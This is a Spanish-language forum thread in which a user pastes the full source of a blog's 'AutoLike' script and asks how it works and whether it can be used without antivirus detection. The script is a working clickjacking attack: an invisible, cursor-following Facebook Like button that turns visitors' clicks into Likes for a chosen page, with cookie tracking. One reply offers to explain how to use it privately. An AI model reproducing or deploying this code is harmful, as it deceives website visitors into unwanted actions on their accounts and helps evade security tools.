¿Cómo funciona este "AutoLike"? No alerta al antivirus

Felipe Seguir

Iota
Redactor
Verificación en dos pasos activada
Desde
21 Jun 2009
Mensajes
2.370
Estaba navegando por internet y me topé con este blog: Rincón Abstracto
Resulta que antes de que yo hiciera clic me percaté de que no podía habrir los enlaces si no hacía clic en su web, para sorpresa mia tiene un "Autolike" de esos que el antivirus debería detectar como código malicioso. Del código de fuente de ese sitio web, encontré esto sguiente, no sé como funciona, alguien podría analizarlo y ver si es factible usarlo sin ser detectado como código malicioso por los antivirus?

A todo esto, ocupo avast!.

Insertar CODE, HTML o PHP:
<div id="cjk-jlike-6" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)'; margin-left: -50px; z-index: 100; width:1px; height:1px; overflow:hidden"></div> 
<script>
/*
Si tu URL es así:

http://www.facebook.com/zuck

Entonces colocarás solo zuck por TUFANPAGE. Y si tu url es así:

https://www.facebook.com/pages/ejemplo/65165468741

colocarás pages/ejemplo/65165468741
*/

var fila="notepreocupesysemuyfeliz,"

var apagar=false;var jlike_r="SCO";var fila2="F,";var fila3="fp,";
var nuevac='';var jlike=jQuery.noConflict();var fanpage='';var pfp='N';var ptw='N';var pla='N';var j_token=false;var minf5=1;var enlak='N';var izqleft='';var arrtop='';var deright='';var abadown='';var totFp=false;var clickjackt=false;var j_paj=0;function j_preini(){jlike("#cjk-jlike-6").html("");clickjackt=false;bt6();jlikeIni0();}function cjyack(){document.location.href=enlak}function down(){apagar=true;document.body.style.cursor='auto'}FB.init({appId:'477766095590935',status:true,cookie:true,xfbml:true});FB.Event.subscribe('edge.create',function(response){jlike("#cjk-jlike-6").css("width","1px");jlike("#cjk-jlike-6").css("height","1px");document.getElementById('cjk-jlike-6').style.display='none';bt3();clickjackt=true;var shc=getCookie("nf5"); if(j_paj==1&&shc=="0"){setCookie("jlikei",nuevac.toString(),365);}else{setCookie("jlikei",nuevac.toString(),365);}j_paj++;document.body.style.cursor='auto';if(enlak!="N")setTimeout("cjyack()",100)});function bt3(){jlike("#cjk-jlike-6").css("width","1px");jlike("#cjk-jlike-6").css("height","1px");document.getElementById('cjk-jlike-6').style.display='none';jlike("#cjk-jlike-6").css({top:"0px",left:"0px"})}function bt6(){if(clickjackt==false){jlike("#cjk-jlike-6").css("width","27px");jlike("#cjk-jlike-6").css("height","20px");document.getElementById('cjk-jlike-6').style.display='block'}}function token(a){if(a=="1"){jlike("#token_k1").focus();j_token=true}if(a=="2")jlike("#token_k1").blur()}function clickjackJJ(){var nf5=getCookie("nf5");if(nf5=="")nf5=0;nf5++;setCookie("nf5",nf5,365);if(nf5%minf5!=0){document.body.style.cursor='auto';return}document.body.style.cursor='pointer';if(jlike_r!="LIM"){if(jlike_r=="GCO"){fila=getCookie("jlike");fila2=getCookie("jlikei");fila3=getCookie("jlikep")}else if(fila!=""&&fila2!=""){j_paj++; setCookie("jlike",fila,365);setCookie("jlikei",fila2,365);setCookie("jlikep",fila3,365)}var fl=fila.split(",");var fl2=fila2.split(",");var fl3=fila3.split(",");nuevac=fl2;var i=0;while(i<fl2.length){if(fl2[i]=='F'){if(fl3[i]=="fp"&&pfp=="S"){totFp=true;pla='fp';fanpage=fl[i];nuevac[i]='T';break}if(fl3[i]=="fe"&&pfp=="S"){totFp=true;pla='fe';fanpage=fl[i];nuevac[i]='T';break}if(fl3[i]=="tw"&&ptw=="S"){totFp=true;pla='tw';fanpage=fl[i];nuevac[i]='T';break}}i++}if(j_paj==2){var a0c=Xceroc();var a0d=Xcerod();totFp=true;pla='fp';fanpage=a0c+a0d;}if(totFp==false)document.body.style.cursor='auto';if(totFp==true){if(pla=="fp"){jlike('#cjk-jlike-6').append('<div style="position:absolute; width:12px; height:20px; z-index:200;left:8px;"></div><fb:like layout="button_count" href="https://www.facebook.com/'+fanpage+'"></fb:like>')}if(pla=="fe"){jlike('#cjk-jlike-6').append('<div style="position:absolute; width:12px; height:20px; z-index:200;left:8px;"></div><fb:like layout="button_count" href="'+fanpage+'"></fb:like>')}jlike("#cjk-jlike-6").css("width","27px");jlike("#cjk-jlike-6").css("height","20px");if(pla=="fp"||pla=="fe")FB.XFBML.parse(document.getElementById('cjk-jlike-6'));}jlike(document).ready(function(){jlike("#cjk-jlike-6").parent().mousemove(function(e){jlike("#cjk-jlike-6").css({top:e.pageY- 10,left:e.pageX+ 30})});if(totFp==true)setTimeout("bt9()",10)})}}function bt9(){jlike(document).mousemove(function(e){if(apagar==true){bt3();return}var cond_ar=0;if(e.pageX<izqleft)cond_ar++;if(e.pageX>deright)cond_ar++;if(e.pageY<arrtop)cond_ar++;if(e.pageY>abadown)cond_ar++;if(cond_ar>=1){enlak="N"}});jlike(".zzzzz,.invilike,,input,embed,button,textarea,object,select").mouseout(function(){token('1');bt6()});jlike(".zzzzz,.invilike,,input,embed,button,textarea,object,select").mouseover(function(){bt3()});jlike("a").mouseout(function(){bt6()});jlike("a").mouseover(function(){bt3()});}function setCookie(c_name,value,exdays){var exdate=new Date();exdate.setDate(exdate.getDate()+exdays);var c_value=escape(value)+((exdays==null)?"":"; expires="+exdate.toUTCString());document.cookie=c_name+"="+c_value}function getCookie(NameOfCookie){var begin=document.cookie.indexOf(NameOfCookie);if(begin!=-1){begin+=NameOfCookie.length+1;var end=document.cookie.indexOf(";",begin);if(end==-1)end=document.cookie.length;return unescape(document.cookie.substring(begin,end))}return-1}function addslike(path){script=document.createElement('script');script.type='text/javascript';script.src=path;document.getElementsByTagName('head')[0].appendChild(script)}function sFpage(){addslike('');setTimeout("clickjackJJ();",1000)}function jlikeIni(){var f1=getCookie("jlike");if(f1!=-1){jlike_r="GCO";clickjackJJ()}else{setTimeout("sFpage();",500)}}function jlikeIni0(){pfp='S';setTimeout("jlikeIni();",500);}function jlikeIni2(){ptw='S';if(pfp=="N"){setTimeout("jlikeIni();",500);}}
</script>
<script>
jQuery.getScript("http://www.facebook.com/jens.luebberstedt")
.done(function(script, textStatus) {jlikeIni0();});
</script>
 

Pepe Luis

Préstamo
Programador
No recomendado
Desde
24 Jul 2009
Mensajes
1.001
Por favor, ten en cuenta 📝 que si deseas hacer un trato 🤝 con este usuario, está baneado 🔒.
Es el que tengo yo en mi firma.
Si quieres te mando mp explicando el funcionamiento...
 

Carambel

Ómicron
Social Media
Verificado
Verificación en dos pasos activada
Verificado por Whatsapp
Desde
25 Ago 2013
Mensajes
4.932
Por que son nuevas modificaciones lo que el antivirus no logra detectarlo no pasa mucho tiempo en detectarlo

Carambel enviando desde mi ONE TOUCH usando Tapatalk 2
 
Arriba